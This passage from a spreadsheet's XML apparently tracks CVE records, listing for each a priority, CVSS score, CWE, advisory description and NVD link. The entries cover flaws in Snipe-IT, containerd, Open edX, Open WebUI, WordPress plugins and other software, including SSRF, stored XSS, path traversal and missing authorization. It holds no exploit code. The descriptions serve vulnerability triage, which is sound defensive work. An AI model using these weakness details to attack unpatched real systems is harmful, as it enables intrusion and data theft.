          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86547</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86748</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr"/>
      <c r="Q663" s="5" t="inlineStr">
        <is>
          <t>CWE-460</t>
        </is>
      </c>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 wipe the database before validating the uploaded backup archive in the restore endpoint. Superusers uploading corrupted or invalid zip files trigger permanent data loss with no recovery path or rollback mechanism.</t>
        </is>
      </c>
      <c r="S663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86748</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86777</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr"/>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr"/>
      <c r="Q664" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>AlchemyCMS versions before 7.4.16 and 8.x before 8.3.6 fail to authorize access to the GET /api/nodes endpoint, allowing unauthenticated attackers to retrieve all navigation nodes. Attackers can access the endpoint without authentication to disclose restricted page names, URL paths, and internal URLs from all sites and languages.</t>
        </is>
      </c>
      <c r="S664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86777</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87747</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr"/>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr"/>
      <c r="Q665" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>The Enterprise Cloud Database developed by Ragic has an Arbitrary File Read vulnerability. Privileged remote attackers can exploit Relative Path Traversal to download arbitrary system files.</t>
        </is>
      </c>
      <c r="S665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87747</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87810</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr"/>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr"/>
      <c r="Q666" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>Siyuan before v3.8.2 contains an information disclosure vulnerability in the POST /api/search/fullTextSearchBlock endpoint that filters private blocks from results but returns unfiltered match counts. Unauthenticated publish-mode readers can submit arbitrary search terms to learn whether matching content exists in hidden or unpublished documents and determine the number of matching blocks and pages.</t>
        </is>
      </c>
      <c r="S666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87810</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87820</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr"/>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr"/>
      <c r="Q667" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>CyberPanel versions 2.4.3 through 2.4.5 expose unauthenticated AI Scanner debugging endpoints that disclose administrator usernames, API-key prefixes, scan identifiers, target domains, and account metadata. Unauthenticated attackers can enumerate panel administrators and recent scanner activity to inventory multi-tenant installations and facilitate follow-on attacks.</t>
        </is>
      </c>
      <c r="S667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87820</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15690</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr"/>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr"/>
      <c r="Q668" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>The Content Mask WordPress plugin before 1.8.5.6 does not properly sanitise and escape content submitted with a post before outputting it in the pages it generates, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks against any user viewing or previewing the affected page.
The Content Mask WordPress plugin before 1.8.5.6's option to restrict its use by role does not prevent this.</t>
        </is>
      </c>
      <c r="S668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15690</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-46808</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr"/>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr"/>
      <c r="Q669" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>An Insertion of Sensitive Information into Log File vulnerability in SUSE neuvector manager exposes sensitive information into the manager container’s log
This issue affects neuvector: before 5.4.5.</t>
        </is>
      </c>
      <c r="S669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-46808</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18796</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>30a5e7fb-040d-440a-8cdf-a4a2068ce72e</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr"/>
      <c r="Q670" s="5" t="inlineStr">
        <is>
          <t>CWE-1342</t>
        </is>
      </c>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>Any application that
     uses external QSPI flash for encrypted XIP on nRF5340 and relies on that
     encryption for confidentiality and/or integrity of the externally stored
     code. No specific nRF Connect SDK version is the root cause; the weakness
     is in the on-the-fly decryption scheme.</t>
        </is>
      </c>
      <c r="S670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18796</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19398</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr"/>
      <c r="Q671" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write in the SmiFlash SMM module of ASUS FA507NU and FA507NV BIOS allows a local  administrator to cause a system crash (BSOD) or BIOS corruption via a crafted software SMI (SW SMI) request with an oversized length value.Refer to the ' 
Security Update for ASUS FA507NV / FA507NU BIOS   ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="S671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19398</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32639</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr"/>
      <c r="Q672" s="5" t="inlineStr">
        <is>
          <t>CWE-289</t>
        </is>
      </c>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, the CMS section's Theme Editor AJAX handlers did not enforce per-template-type permission checks, allowing a backend user with any single CMS permission to act on template types outside their authorized scope. The CMS controller gated access to the section as a whole using OR-logic across its five permissions, but individual handlers such as onSave(), onDelete(), and onDeleteTemplates() did not verify that the user held the specific permission for the requested template type, so a user with only cms.manage_pages could craft AJAX requests to delete layouts, modify partials, or read content files. Separately, the AssetList widget was registered for any user who passed the controller gate regardless of the cms.manage_assets permission, and its onUpload() handler omitted the theme-validation call present on the other mutating handlers, permitting unauthorized file uploads into the active theme's asset directory. Exploitation requires an authenticated backend account holding at least one of the CMS Theme Editor permissions. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32639</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53495</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M673" s="5" t="inlineStr">
        <is>
          <t>1.7.35, 2.0.12, 2.2.8, 2.3.5</t>
        </is>
      </c>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr"/>
      <c r="P673" s="5" t="inlineStr"/>
      <c r="Q673" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>### Impact
A bug in containerd's CRI ExecSync implementation allows exec probes and lifecycle hooks with background child processes to keep containerd's stdio-drain goroutines indefinitely blocked. Because the I/O drain phase lacks a default timeout or context cancellation handling, repeated ExecSync invocations (like probes) that include long-lived background processes against a container can cause containerd to leak goroutines and host memory. Over time, this resource exhaustion can cause the containerd daemon to be terminated by the OOM killer, rendering containerd unavailable until it is restarted. This issue affects containerd on Linux systems running with the CRI plugin enabled. Users not using containerd's CRI implementation or not running containers on Linux are not affected.
### Patches
This bug has been fixed in containerd 2.3.5, 2.2.8, 2.0.12, and 1.7.35. Users should update to these versions to resolve the issue.
### Workarounds
Ensure exec probes and lifecycle hooks do not launch long-lived background child processes.
### Credits
The containerd project would like to thank XlabAI Team of Tencent Xuanwu Lab (xlabai@tencent.com), including Guannan Wang, Zhanpeng Liu, Jiashuo Liang, and Guancheng Li, and @IamwhatIamSY who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If there are any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Send an email to [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Send an email to [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="S673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53495</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55421</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr"/>
      <c r="Q674" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 00b7c3c, the endpoint accepts user-supplied files[].url, performs a server-side fetch using "requests.get(url, allow_redirects=True)". The fetched bytes are then returned inside a ZIP response. This enables SSRF with response exfiltration. Redirect-following is enabled, and there is no timeout in the vulnerable fetch path. This issue has been patched via commit 00b7c3c.</t>
        </is>
      </c>
      <c r="S674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55421</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55535</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr"/>
      <c r="Q675" s="5" t="inlineStr">
        <is>
          <t>CWE-367, CWE-918</t>
        </is>
      </c>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, the Jobs API validate_webhook_url() path fails open on socket.gaierror and does not bind the validated address to the later request. An attacker webhook_url can later resolve to 127.0.0.1, 169.254.169.254, or another internal address. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55535</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83541</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr"/>
      <c r="Q676" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>The Sina Extension for Elementor WordPress plugin before 3.10.4 does not properly escape a Table widget setting before outputting it within an HTML attribute, which could allow users with the Contributor role and above to perform Stored Cross-Site Scripting attacks.</t>
        </is>
      </c>
      <c r="S676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83541</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87015</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr"/>
      <c r="Q677" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.6.27 until 0.11.1, backend/open_webui/utils/tools.py captured a cookie jar from the enclosing connection loop instead of binding it to each external tool callable. When multiple tool servers were attached and a session or system OAuth connection was processed last, a request to a different server configured for bearer authentication could include the calling user's Open WebUI session cookies, allowing that server's operator to reuse the session and take over the account. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87015</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87872</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr"/>
      <c r="Q678" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the OCAPI modules (ocapi_command, ocapi_info) of the
